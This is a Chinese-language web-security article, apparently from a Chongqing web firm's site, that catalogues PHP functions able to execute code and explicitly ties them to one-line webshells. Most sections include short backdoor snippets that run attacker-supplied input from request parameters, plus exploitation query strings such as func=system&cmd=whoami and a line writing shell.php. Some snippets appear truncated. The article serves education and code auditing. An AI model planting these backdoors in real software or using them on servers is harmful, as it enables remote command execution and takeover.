网站建设、公众号开发、微网站、微商城、小程序就找牛创网络 !

7*24小时服务专线： 152-150-65-006 023-68263070 扫描二维码加我微信

web安全团结互助，让我们共同进步！

当前位置：主页 > 技术资讯 > 网络安全 > web安全 >

我们的优势： 10年相关行业经验，专业设计师量身定制设计师一对一服务模式，上百家客户案例！企业保证，正规流程，正规合作 7*24小时在线服务，售后无忧

web 安全之-PHP代码执行函数总结

文章来源：重庆网络安全围观次数：

分享到:

摘要：PHP中可以执行代码的函数，常用于编写一句话木马，可能导致代码执行漏洞，这里对代码执行函数做一些归纳

PHP中可以执行代码的函数，常用于编写一句话木马，可能导致代码执行漏洞，这里对代码执行函数做一些归纳。

　　常见代码执行函数，如

   
 　　　　eval()、assert()、preg_replace()、create_function()
   
 　　　　array_map()、call_user_func()、call_user_func_array()，array_filter，usort，uasort()

　　　　文件操作函数、动态函数（$a($b)）

1、eval()

　　eval() 函数把字符串按照 PHP 代码来计算，如常见的一句话后门程序：

2、assert()

　　与eval类似，字符串被 assert() 当做 PHP 代码来执行，如：

示例代码：

   
  
3、preg_replace() 　　mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) 　　搜索subject中匹配pattern的部分， 以replacement进行替换。 　　preg_replace()函数原本是执行一个正则表达式的搜索和替换，但因为存在危险的/e修饰符，使 preg_replace() 将 replacement 参数当作 PHP 代码 示例代码：

//?cmd=phpinfo()

@preg_replace("/abc/e",$_REQUEST['cmd'],"abcd");

?>

4、create_function()

　　create_function主要用来创建匿名函数，如果没有严格对参数传递进行过滤，攻击者可以构造特殊字符串传递给create_function()执行任意命令。

代码示例：

//?cmd=phpinfo();

$func =create_function('',$_REQUEST['cmd']);

$func();

?>

5、array_map()

　　array_map() 函数将用户自定义函数作用到数组中的每个值上，并返回用户自定义函数作用后的带有新值的数组。回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致。

代码示例：

复制代码

//?func=system&cmd=whoami

$func=$_GET['func'];

$cmd=$_GET['cmd'];

$array[0]=$cmd;

$new_array=array_map($func,$array);

//print_r($new_array);

?>

复制代码

6、call_user_func()/call_user_func_array ()

　　call_user_func — 把第一个参数作为回调函数调用,其余参数是回调函数的参数。

　　call_user_func_array — 调用回调函数，并把一个数组参数作为回调函数的参数

复制代码

//?cmd=phpinfo()

@call_user_func(assert,$_GET['cmd']);

?>

//?cmd=phpinfo()

$cmd=$_GET['cmd'];

$array[0]=$cmd;

call_user_func_array("assert",$array);

?>

复制代码

7、array_filter()

　　array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )

　　依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true，则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。

复制代码

//?func=system&cmd=whoami

$cmd=$_GET['cmd'];

$array1=array($cmd);

$func =$_GET['func'];

array_filter($array1,$func);

?>

复制代码

8、usort()、uasort()

　　usort() 通过用户自定义的比较函数对数组进行排序。

　　uasort() 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联。

代码示例：

复制代码

php环境>=5.6才能用

利用方式：

test.php?1[]=1-1&1[]=eval($_POST['x'])&2=assert

[POST]:x=phpinfo();

php环境>=<5.6才能用

利用方式：

test.php?1=1+1&2=eval($_POST[x])

[POST]:x=phpinfo();

复制代码

源自：https://www.wd0g.com/?p=190

https://www.leavesongs.com/PHP/bypass-eval-length-restrict.html

9、文件操作函数

　　file_put_contents() 函数把一个字符串写入文件中。

　　fputs() 函数写入文件

代码示例：

复制代码

$test='';

file_put_contents('test1.php',$test);

?>

fputs(fopen('shell.php','w'),'');

?>

复制代码

10、动态函数

　　PHP函数直接由字符串拼接

代码示例：

//?a=assert&b=phpinfo()

$_GET['a']($_GET['b']);

?>

本文由重庆网络安全整理发布,转载请保留出处，内容部分来自于互联网，如有侵权请联系我们删除。

相关热词搜索：web 安全 php 代码执行

上一篇：第一页
下一篇：手机验证码常见攻击手法和漏洞总结

关于我们

重庆牛创网络科技有限责任公司是一群技术强大、思维活跃、拥有创新精神的年轻人创立，公司致力于为企业提供全面、周到、专业的互联网解决方案，提供网站建设、网络推广、网络安全审计、wifi营销认证、网站运营维护、域名注册、虚拟主机、企业邮局、企业形象设计等多种信息产品和服务。

联系我们

公司电话： 023—68263070
办公地址：重庆市北碚区金华路399号
邮箱：120481297@qq.com
技术咨询：15215065006

“互联网+”方案

重庆网站建设

备案图标渝ICP备19004889号-1 渝公网安备 50010902000896号

行业安全认证

web安全团结互助，让我们共同进步！

web 安全之-PHP代码执行函数总结

热门资讯

关于我们

联系我们

“互联网+”方案